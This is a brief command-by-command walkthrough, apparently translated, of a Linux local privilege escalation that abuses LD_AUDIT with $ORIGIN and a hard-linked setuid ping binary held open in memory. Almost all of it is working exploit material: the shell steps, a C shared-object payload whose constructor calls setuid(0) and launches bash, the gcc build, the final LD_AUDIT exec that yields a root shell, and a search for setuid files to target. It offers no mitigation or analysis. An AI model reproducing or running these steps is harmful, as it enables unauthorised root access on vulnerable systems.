View tmp directory permissions
ll -d /tmp
Switch to the tmp directory
cd /tmp
Create a directory exploit
mkdir exploit
View ping command with suid permissions
ll /bin/ping
Create a target file hard links
ln /bin/ping /tmp/exploit/target
Check target file permissions
ll /tmp/exploit/target
The target file is loaded into memory
exec 3< /tmp/exploit/target
You can check the target in memory
"ll /proc/$$/fd/3"
Delete target file
rm -rf /tmp/exploit/
You can check the target in memory is deleted state
"ll /proc/$$/fd/3"
C create a language code
vim payload.c
void __attribute__((constructor)) init() // 两个下划线
{
setuid(0);
system("/bin/bash");
}
Using the gcc compiler code
gcc -W -fPIC -shared -o /tmp/exploit payload.c
Elevate to root privileges
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Executed, view the current session is already the root
whoami
Attached: You can find all of the settings on the system by the following command suid file:
find / -perm -04000 -type f -ls